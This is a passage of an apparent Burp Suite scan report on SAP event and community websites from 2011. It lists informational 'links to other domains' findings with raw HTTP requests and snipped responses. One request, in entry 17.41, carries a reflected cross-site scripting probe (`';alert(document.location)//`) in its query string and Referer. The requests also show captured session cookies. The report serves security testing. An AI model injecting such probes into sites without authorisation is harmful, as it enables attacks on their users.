<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
<div class="sapLogo" ><a href="http://www.sap.com" title="SAP" target="_blank"><img src="App_Themes/Default/images/sap-logo.png">
...[SNIP]...
<li><a href="https://www.sap.com/campaign/G_NL_SUBSCRIPTION_SAP_BUSINESS_FLASH/index.epx?URL_ID=WEB11" target="_blank">Newsletter</a>
...[SNIP]...
<li><a href="http://www.sap.com/solutions/products/sap-bydesign/index.epx#/buy-now/index.epx?class=utilitynav-buy" target="_self">Buy Now</a>
...[SNIP]...
<li><a href="https://www.sap.com/contactsap/index.epx?pmelayer=true" target="_blank"> Contact Us</a>
...[SNIP]...
<li><a href="http://www.sapphirenow.cn" target="_blank" >Beijing, China Nov. 15-17, 2011</a>
...[SNIP]...
<li><a href="http://www.sapandasug.com/">Orlando, Florida May 14-16, 2012</a>
...[SNIP]...
<li><a href="http://www.sap.com/about-sap/events/worldtour/index.epx">SAP World Tour 2011</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx" target="_blank">SAP.com</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx#/events/index.epx" target="_blank">Events</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank" class="linkedin">linkedin</a>
...[SNIP]...
<li><a href="http://youtube.com/sapphirenow" target="_blank" class="youtube">youtube</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sapphirenow" target="_blank" class="facebook">facebook</a>
...[SNIP]...
<li><a href="http://Twitter.com/sapphirenow" target="_blank" class="twitter">twitter</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target ="_blank">Privacy</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/terms_of_use.epx" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target ="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<br />
Be the first to know when; sign up for an email alert, <a href="https://www.delegate.com/sap/sapphire/interest/" class="aLink" target="_blank">click here</a>
...[SNIP]...
<td width="40"><a href="http://twitter.com/#!/sapteched" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapteched" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.youtube.com/user/SAPCommunities#g/c/3DC79D602F6E7FE1" target="_blank"><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/osview/canvas?_ch_page_id=2&_ch_panel_id=3&_ch_app_id=30&_applicationId=2000&appParams={"referrer"%3A"profile","go_to"%3A"events/540377"}&_ownerId=11767433&completeUrlHash=kekP" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://Twitter.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://youtube.com/sapphirenow" target="_blank" ><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
17.40. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=t2xe1y45iffmlseg0oqr4aja

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:58:39 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?fca929c0-0dd1-4c67-8662-b7d0fe230810"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
<div class="sapLogo" ><a href="http://www.sap.com" title="SAP" target="_blank"><img src="App_Themes/Default/images/sap-logo.png">
...[SNIP]...
<li><a href="https://www.sap.com/campaign/G_NL_SUBSCRIPTION_SAP_BUSINESS_FLASH/index.epx?URL_ID=WEB11" target="_blank">Newsletter</a>
...[SNIP]...
<li><a href="http://www.sap.com/solutions/products/sap-bydesign/index.epx#/buy-now/index.epx?class=utilitynav-buy" target="_self">Buy Now</a>
...[SNIP]...
<li><a href="https://www.sap.com/contactsap/index.epx?pmelayer=true" target="_blank"> Contact Us</a>
...[SNIP]...
<li><a href="http://www.sapphirenow.cn" target="_blank" >Beijing, China Nov. 15-17, 2011</a>
...[SNIP]...
<li><a href="http://www.sapandasug.com/">Orlando, Florida May 14-16, 2012</a>
...[SNIP]...
<li><a href="http://www.sap.com/about-sap/events/worldtour/index.epx">SAP World Tour 2011</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx" target="_blank">SAP.com</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx#/events/index.epx" target="_blank">Events</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank" class="linkedin">linkedin</a>
...[SNIP]...
<li><a href="http://youtube.com/sapphirenow" target="_blank" class="youtube">youtube</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sapphirenow" target="_blank" class="facebook">facebook</a>
...[SNIP]...
<li><a href="http://Twitter.com/sapphirenow" target="_blank" class="twitter">twitter</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target ="_blank">Privacy</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/terms_of_use.epx" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target ="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<br />
Be the first to know when; sign up for an email alert, <a href="https://www.delegate.com/sap/sapphire/interest/" class="aLink" target="_blank">click here</a>
...[SNIP]...
<td width="40"><a href="http://twitter.com/#!/sapteched" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapteched" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.youtube.com/user/SAPCommunities#g/c/3DC79D602F6E7FE1" target="_blank"><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/osview/canvas?_ch_page_id=2&_ch_panel_id=3&_ch_app_id=30&_applicationId=2000&appParams={"referrer"%3A"profile","go_to"%3A"events/540377"}&_ownerId=11767433&completeUrlHash=kekP" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://Twitter.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://youtube.com/sapphirenow" target="_blank" ><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
17.41. http://www.sapvirtualevents.com/teched/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /teched/default.aspx?433fe';alert(document.location)//fea0f539288 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapvirtualevents.com/teched/default.aspx?433fe';alert(document.location)//fea0f539288
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bxadluezgklsnzqccjczis45; X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; _pk_ref.1.cbc3=%5B%22%22%2C%22%22%2C1318691910%2C%22http%3A%2F%2Fburp%2Fshow%2F16%22%5D; _pk_id.1.cbc3=7b9b230ebda00332.1318689026.2.1318691910.1318689910.; _pk_ses.1.cbc3=*; __utma=217282836.383781452.1318689024.1318689024.1318691909.2; __utmb=217282836.2.10.1318691913; __utmc=217282836; __utmz=217282836.1318691913.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; 37021986-VID=5110247826455; 37021986-SKEY=6638045003516868152; HumanClickSiteContainerID_37021986=STANDALONE; IsFirstTimeLogin=1; userID=1; securityRoleID=0; .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||1e26fff5-2697-4f05-888f-69f28a85233a|United States|4b117873-111d-43fb-aa45-4e60c941153b|true

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:18:31 GMT
Content-Length: 92658


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
</div>

   <script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
<div class="sapLogo"><a href="http://www.sap.com" title="SAP" target="_blank"><img src="App_Themes/Default/images/sap-logo.png">
...[SNIP]...
<li>
<a href="https://www.sap.com/campaign/G_NL_SUBSCRIPTION_SAP_BUSINESS_FLASH/index.epx?URL_ID=WEB11" target="_blank">Newsletter</a>
...[SNIP]...
<li>
<a href="http://www.sap.com/index.epx#/buy-now/index.epx?class=utilitynav-buy" target="_blank">Buy Now</a>
...[SNIP]...
<li><a href="https://www.sap.com/contactsap/index.epx?pmelayer=true" target="_blank">Contact Us</a>
...[SNIP]...
<div style="text-align :right">
                           <a href="http://sapteched.news-sap.com/feed/rss/" target="_blank" >
                            <img src="App_Themes/Default/images/imagesCAVB5OL3.jpg" alt="" />
...[SNIP]...
<!-- GAM Code Starts -->

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<td align="center" style="padding-left: 2px; padding-right: 2px;">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<td align="center" style="padding-left: 2px; padding-right: 2px;">
<a href="http://twitter.com/share" class="twitter-share-button" data-count="none"
data-via="sapteched" data-related="sapevents">Tweet</a><script type="text/javascript"
src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<td align="center" style="padding-left: 2px; padding-right: 2px;">
<script src="http://platform.linkedin.com/in.js" type="text/javascript"></script>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style " >
<a style="width:55px;" href="http://www.addthis.com/bookmark.php?v=250&amp;pubid=sapglobalmarketing"
class="addthis_button_compact">Share</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=sapglobalmarketing"></script>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups/SAP-TECHED-1900632?gid=1900632&trk=anet_ug_grppro" target="_blank" class="linkedin">linkedin</a>
...[SNIP]...
<li><a href="http://www.youtube.com/user/SAPCommunities#g/c/3EE4F3B15329DB1E" target="_blank" class="youtube">youtube</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sapteched" target="_blank" class="facebook">facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/#!/sapteched" target="_blank" class="twitter">twitter</a>
...[SNIP]...
<li>        
            <a href="http://www.virtualsapteched.com" target="_blank">
            SAP TechEd 2010 Replays
            </a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target ="_blank">Privacy</a>
...[SNIP]...
<li>&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://www.sap.com/corporate-en/our-company/legal/terms_of_use.epx" target="_blank">Terms of Use</a>
...[SNIP]...
<li>&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target ="_blank">Legal Disclosure</a>
...[SNIP]...
<li>&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
</iframe>
<script language="JavaScript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB"></script>
...[SNIP]...
17.42. http://www.sapvirtualevents.com/teched/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /teched/default.aspx
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
Set-Cookie: IsFirstTimeLogin=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: securityRoleID=0; path=/
Set-Cookie: .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||7df06b41-67e5-4e76-b695-2d83bcab420b|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; expires=Tue, 15-Nov-2011 15:30:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:12 GMT
Content-Length: 29108

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fteched%2fdefault.aspx">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional
...[SNIP]...
<div class="sapLogo" ><a href="http://www.sap.com" title="SAP" target="_blank"><img src="App_Themes/Default/images/sap-logo.png">
...[SNIP]...
<li><a href="https://www.sap.com/campaign/G_NL_SUBSCRIPTION_SAP_BUSINESS_FLASH/index.epx" target="_blank">Newsletter
</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx#/buy-now/index.epx?class=utilitynav-buy" target="_blank">Buy Now</a>
...[SNIP]...
<li><a href="https://www.sap.com/contactsap/index.epx?pmelayer=true" target="_blank">Contact Us</a>
...[SNIP]...
<div style="text-align :right">
                           <a href="http://sapteched.news-sap.com/feed/rss/" target="_blank" >
                            <img src="App_Themes/Default/images/imagesCAVB5OL3.jpg" alt="" />
...[SNIP]...
<!-- GAM Code Starts -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups/SAP-TECHED-1900632?gid=1900632&trk=anet_ug_grppro" target="_blank" class="linkedin">linkedin</a>
...[SNIP]...
<li><a href="http://www.youtube.com/user/SAPCommunities#g/c/3EE4F3B15329DB1E" target="_blank" class="youtube">youtube</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sapteched" target="_blank" class="facebook">facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/#!/sapteched" target="_blank" class="twitter">twitter</a>
...[SNIP]...
<li><a href=http://www.sap.com/corporate-en/our-company/legal/privacy.epx target =_blank>Privacy</a></li><li><a href=http://www.sap.com/corporate-en/our-company/legal/terms_of_use.epx target =_blank>Terms of Use</a>
...[SNIP]...
<li><a href=http://www.sap.com/corporate-en/our-company/legal/impressum.epx target =_blank>Legal Disclosure</a>
...[SNIP]...
<li><a href=http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx target =_blank>Copyright</a>
...[SNIP]...
17.43. http://www.sdn.sap.com/irj/scn/advancedsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/advancedsearch

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /irj/scn/advancedsearch?query=xss+password+help+faq+contact HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fq%2ftop_weblogs; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318691787|check#true#1318689987; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Asdnweblogs%253Apopularposts%7C1318691728224%3B%20pe%3Dno%2520value%7C1318691728230%3B%20c3%3Dno%2520value%7C1318691728253%3B%20s_nr%3D1318689928258-New%7C1321281928258%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293528260%3B%20s_visit%3D1%7C1318691728263%3B%20gpv_p47%3Dno%2520value%7C1318691728265%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D6%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Asdnweblogs%2525253Apopularposts%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.searchboxform.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 28741
Date: Sat, 15 Oct 2011 14:59:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<li class="last"><a href="http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector/pgm.76865500?_s_icmp=CG4D7A6D69" target="_blank" >Store</a>
...[SNIP]...
<P mce_keep="true"><A href="http://bit.ly/SCNFB" target=_blank><IMG height=24 alt="Follow Us on Facebook" src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/e0dc1d46-ce92-2d10-1d90-bd6b59c27dc0" width=24 mce_src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/e
...[SNIP]...
</A>&nbsp;&nbsp; <A href="http://bit.ly/SCNTwR" target=_blank><IMG height=24 alt="Follow SCN on Twitter" src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/30beea32-cf92-2d10-c39d-df6728c1d180" width=24 mce_src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/3
...[SNIP]...
</A>&nbsp;&nbsp;&nbsp;<A href="http://bit.ly/SCNLnI" target=_blank><IMG height=24 alt="Follow Us on LinkedIn" src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/f03915bd-cf92-2d10-478c-cbe7715c73b4" width=24 mce_src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/f
...[SNIP]...
</A>&nbsp; &nbsp;<A href="http://bit.ly/SCNyouT" target=_blank><IMG height=24 alt="Follow Us on YouTube" src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/9014fd41-cf92-2d10-6e8b-f69878cc0b7f" width=24 mce_src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/90
...[SNIP]...
</A>&nbsp; &nbsp;<A href="http://bit.ly/SCNFlr" target=_blank><IMG height=24 alt="Follow Us on Flickr" src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/104c3912-cf92-2d10-7bab-b4bb160f7154" width=24 mce_src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/104
...[SNIP]...
<LI><A href="http://www.youtube.com/user/SAPCommunities?feature=mhum#p/c/954293E75EFD857D/44/ravvlID_BG8" target=_blank>Contax Inc., CTO uses SCN</A>
...[SNIP]...
<LI><A href="http://www.youtube.com/user/SAPCommunities?feature=mhum#p/c/954293E75EFD857D/39/EkQg8OL8dKw" target=_blank>Walt Disney Company uses SCN</A>
...[SNIP]...
<LI><A href="http://www.youtube.com/user/SAPCommunities?feature=mhum#p/c/954293E75EFD857D/38/AklUa8k2oRI" target=_blank>Harley-Davidson uses SCN</A>
...[SNIP]...
<LI><A href="http://www.youtube.com/user/SAPCommunities?feature=mhum#p/c/954293E75EFD857D/46/kRkMJNroCcs" target=_blank>Bose uses SCN</A>
...[SNIP]...
17.44. http://www.sdn.sap.com/irj/scn/weblogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/weblogs

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /irj/scn/weblogs?blog=/weblogs/topic/27 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fforum.jspa%3fforumID%3d209%26start%3d0; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==
Expires: 0
Content-Length: 28880
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:24:59 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<li class="last"><a href="http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector/pgm.76865500?_s_icmp=CG4D7A6D69" target="_blank" >Store</a>
...[SNIP]...
